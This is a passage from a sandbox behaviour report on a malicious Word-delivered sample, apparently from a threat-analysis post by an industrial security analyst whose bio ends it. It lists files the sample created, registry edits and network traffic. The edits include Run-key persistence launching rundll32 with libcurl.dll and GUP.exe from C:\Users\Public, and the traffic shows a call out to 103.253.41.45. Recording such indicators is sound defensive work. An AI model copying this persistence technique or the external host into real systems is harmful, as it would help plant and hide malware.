[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\dwmapi.dll [SHA256: 94b8cb1a796fae827928d293db1e9a019874e158e3667a7588d7f35278b012f1]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\winnsi.dll [SHA256: d4746ba7d785dfb1fc625d52b0def75c72bd980e0891732009155610d2ec8774]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\IPHLPAPI.DLL [SHA256: 24f70676a12cb84cc7770421d8f446bd115e9bea2b877dd4b6d4cb7b80b47a8c]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\dhcpcsvc.dll [SHA256: b5f8b00008da73f431dfa688187505149fc33699e5695408f87d3461fa640906]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\NapiNSP.dll [SHA256: 92747bbfc400260b7f5ac76d295f4f99191d35015881c0a31aa3411fd3118470]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\pnrpnsp.dll [SHA256: ac242595867154f527fc4d7e3768c2526e543dbd690989439c881031a8bb7fe1]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\nlaapi.dll [SHA256: 29fea79d12f38cab5f869d674463fe422e4ad80f673889c73c6c3986cc37eaef]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\mswsock.dll [SHA256: fb1d20ae19be2572e15972a2fb43b031d9ca244fe8a765ac699083bee9b51e12]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\dnsapi.dll [SHA256: 750408e8bb5d71a40740b3977305555ab50c0b157bfa8f59374bade2f38892bf]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\winrnr.dll [SHA256: 7a46a2098185adfce7f85090e9dce2b1c89d785823344da6fe66d6cc4cf822bc]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\FWPUCLNT.DLL [SHA256: 15651ff8a07de7099f29ca2cc3589b95d6d790c3e93826e7c81352bd1eef52d8]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\rasadhlp.dll [SHA256: 2f13f98ff9d31455d811a1eb6b74d800f1ba26363581b4993119ae498e73ad4d]
[DeleteFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Word\STARTUP
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\netutils.dll [SHA256: 2d1b3d6fbdfac4de5678af9e7de53e91138305620b34798c2432641db7118145]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\wkscli.dll [SHA256: 5bfa3b808f34a245b50b8f207b3a07621b5748518cb179108141d01cfe04d4e1]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\netapi32.dll [SHA256: 3319a5e748e36ae11e321ae76f054865d72721cd29c7efc0a264155f99842720]

Registry Activity:

[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0
[RegSetValue] OSPPSVC.EXE:3696 > HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\ServiceSessionId = 97 7C E4 F2 21 AE 95 4E 91 72 A3 8D C8 AF C7 50
[RegSetValue] OSPPSVC.EXE:3696 > HKU\S-1-5-20\Software\Microsoft\OfficeSoftwareProtectionPlatform\VLRenewalSchedule = 81 6A CB 9F 01 00 00 00 00 00 00 00 04 00 00 00
[RegSetValue] reg.exe:2488 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\CurlUpdate = rundll32.exe C:\Users\Public\libcurl.dll,#52
[RegDeleteValue] taskhostex.exe:2352 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe
[RegSetValue] reg.exe:3976 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\CurlInit = C:\Users\Public\GUP.exe
[RegDeleteValue] taskhostex.exe:2352 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe
[RegSetValue] OSPPSVC.EXE:3696 > HKU\S-1-5-20\Software\Microsoft\OfficeSoftwareProtectionPlatform\VLRenewalSchedule = 81 6A CB 9F 01 00 00 00 00 00 00 00 04 00 00 00

Network Traffic:

[TCP] 127.0.0.1:1095 > GUP.exe:3980
[TCP] rundll32.exe:3548 > 127.0.0.1:9090
[TCP] GUP.exe:3980 > 103.253.41.45:80
[TCP] 103.253.41.45:80 > GUP.exe:3980
[TCP] 127.0.0.1:9090 > rundll32.exe:3548
[TCP] GUP.exe:3980 > 127.0.0.1:1095

Unique Hosts:

103.253.41.45
127.0.0.1

 


About the Author

Pascal Ackerman is a seasoned industrial security professional with a degree in electrical engineering and with 18 years of experience in industrial network design and support, information and network security, risk assessments, pentesting, threat hunting and forensics. After almost two decades of hands-on, in-the-field and consulting experience, he joined ThreatGEN in 2019 and is currently employed as Principal Analyst in Industrial Threat Intelligence & Forensics. His passion lays in analyzing new and existing threats to ICS environments and he fights cyber adversaries both from his home base and while traveling the world with his family as a digital nomad.